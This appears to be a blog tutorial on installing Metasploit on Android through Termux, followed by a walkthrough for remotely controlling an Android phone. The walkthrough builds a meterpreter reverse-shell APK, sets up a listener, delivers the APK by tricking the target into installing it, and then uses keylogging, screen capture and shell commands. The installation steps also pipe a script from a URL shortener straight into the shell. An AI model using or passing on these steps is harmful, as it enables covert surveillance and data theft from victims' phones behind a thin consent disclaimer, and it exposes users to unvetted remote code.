Metasploit is a strong tool used by security experts around the world to find and fix security problems, especially with remote access. This guide shows how to install Metasploit on an Android device using Termux.

This tutorial will explain how to install Metasploit and how to use it, including learning about remote access in a safe setting for security testing.

What is Metasploit?

Metasploit is an open-source framework designed for penetration testing, exploit development, and security research. It is maintained by Rapid7 and contains a vast database of exploits, payloads, and auxiliary modules. With Metasploit you can:

Find security weaknesses. Creating and running code to attack target systems. Testing security and doing assessments. Tasks after an attack, like keeping access.

Many people in cybersecurity use this tool for ethical hacking and red team activities.

Requirements to Install Metasploit in Termux

Before installing Metasploit 6, make sure your device meets the following requirements:

Android device (version 7.0 or higher)

Termux app (Download from F-Droid as the Play Store version is outdated)

Stable internet connection

At least 1.5GB of free storage space

With this requirement you are good to go for installation process of metasploit in Termux

Installation Process of Metasploit in Termux

Follow these steps to install Metasploit 6 on Termux:

Before installing Metasploit, update your package list to ensure all dependencies are up to date. Open Termux and run:

pkg update && pkg upgrade -y

Step 2: Install Required Packages

Before installing Metasploit 6, you need to install several essential packages that are necessary for the framework to function properly. These packages include tools like wget , curl , openssh , git , python3 and ncurses-utils .

To install the necessary packages, enter the following command in Termux:

pkg install wget curl openssh git python3 ncurses-utils -y

This command will automatically download and install the required packages. The -y flag ensures that the installation proceeds without requiring user confirmation for each package.

Step 3: Install Metasploit in Termux

With all the prerequisites in place, you’re now ready to install Metasploit 6 on your Android device. The installation process can be done quickly using a single command that downloads and sets up Metasploit directly within Termux or you can use a manual method.

Installing Metasploit 6 Using a Simple Command

This method streamlines the installation, making it accessible even for beginners who are new to mobile penetration testing.

To install Metasploit 6, simply execute the following command in Termux:

source <(curl -fsSL https://kutt.it/msf)

This command fetches the installation script and automatically sets up Metasploit 6. The process may take some time, depending on your internet speed and device performance.

Alternative Manual Installation Method

If you prefer a more manual approach, you can follow these steps to install Metasploit:

Install wget using the command: pkg install wget Download the installation script: wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh Make the script executable: chmod +x metasploit.sh Run the script to install Metasploit: ./metasploit.sh

The manual installation process provides greater control over the setup, allowing you to monitor each step closely.

Once the installation is complete, Metasploit 6 will be fully installed on your Android device, ready for use. You can verify the installation by running the msfconsole command in Termux.

If Metasploit is installed correctly, this command will launch the Metasploit framework, and you’ll see the Metasploit console appear. This console is where you’ll execute all your penetration testing commands and scripts.

Troubleshooting Common Issues in Installing Metasploit 6 on Android Using Termux

While installing and using Metasploit 6 on Termux may seem straightforward, you might encounter a few issues along the way. Below are some common problems and their solutions to ensure a smooth installation and usage experience.

Fixing "Command Not Found" Error When Running msfconsole

Error! command not found

Issue:

After installation, when you try to run msfconsole , Termux displays the message "command not found".

Solution:

Restart Termux and try running msfconsole again.

If that doesn’t work, reinstall Metasploit by following the steps in the installation guide.

Check for missing dependencies by re-running the installation commands: pkg install wget curl openssh git python3 ncurses-utils -y

Then, follow the installation process again to ensure everything is set up correctly.

Solving Slow Installation or Network Timeouts

Error! The installation of Metasploit is slow, or you get a network timeout during the installation process.

Issue:

Downloading the necessary files takes too long, or the installation process is interrupted due to network timeouts.

Solution:

Ensure your internet connection is stable and use a high-speed Wi-Fi connection if possible.

If you have a slow internet connection, the process may take a while. Be patient or consider upgrading your connection.

Retry the installation by running the same command: source <(curl -fsSL https://kutt.it/msf)

If the issue persists, try running the command at a different time when the network is less congested.

These troubleshooting steps should help resolve the most common issues with installing Metasploit 6 on Termux. If you encounter additional errors, consult online forums or the official documentation for further assistance.

Remote Access an Android Phone Using Metasploit in Termux (Brief Overview)

Remote access is a vulnerability through which attackers can control any device. Most commonly, payloads are used for remote control. Payloads are sent through social engineering or phishing attacks. Once the payload is injected, the actual attack begins. The payload will provide a reverse connection. Most commonly, Metasploit framework is used for generating payloads.

Here’s a brief outline of how you could potentially remote access an Android phone using Metasploit through Termux:

Steps to Control an Android Phone Using Metasploit:

Grant Storage Permissions: Before creating the payload, allow Termux to access your device's storage by running: termux-setup-storage Tap Allow when prompted. This ensures Metasploit can save payloads to the /sdcard/ directory. Create a Payload: Metasploit can create a reverse shell or meterpreter payload that can be used to access the target Android device. To create the payload, use the following command in Termux: msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/payload.apk Replace 127.0.0.1 with your local IP and 4444 with a specific port number for the connection. Set Up the Listener: Next, set up a listener in Metasploit to wait for incoming connections from the target device. This is done by running the following commands: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 4444 exploit This configures Metasploit to listen for the connection from the target phone. Send the Payload to the Target Device: Transfer the payload APK file (payload.apk) to the target device. This can be done using social engineering (e.g., tricking the target into installing the APK) or by exploiting vulnerabilities in the Android OS (such as insecure apps or software). Execute the Payload: Once the target device installs the APK and opens it, the reverse shell will connect back to your Termux device, giving you access to the target device. Gain Control: After the reverse connection is established, you can use Meterpreter commands to control the device. Common Meterpreter commands include: sysinfo – Displays system information about the target device.

– Displays system information about the target device. shell – Opens a system shell on the target.

– Opens a system shell on the target. keyscan_start – Starts keylogging.

– Starts keylogging. screenshare – Starts screen capturing.

By following these steps, you can ethically test the security of Android devices.

Always ensure that you follow the legal guidelines and get explicit consent before conducting any penetration testing.

I hope this guide has helped you understand how to set up and use Metasploit on your Android device via Termux for ethical hacking and penetration testing purposes.

If you have any feedback or questions, please feel free to leave a comment below. I’ll be happy to reply and assist you further! Stay ethical, stay safe!



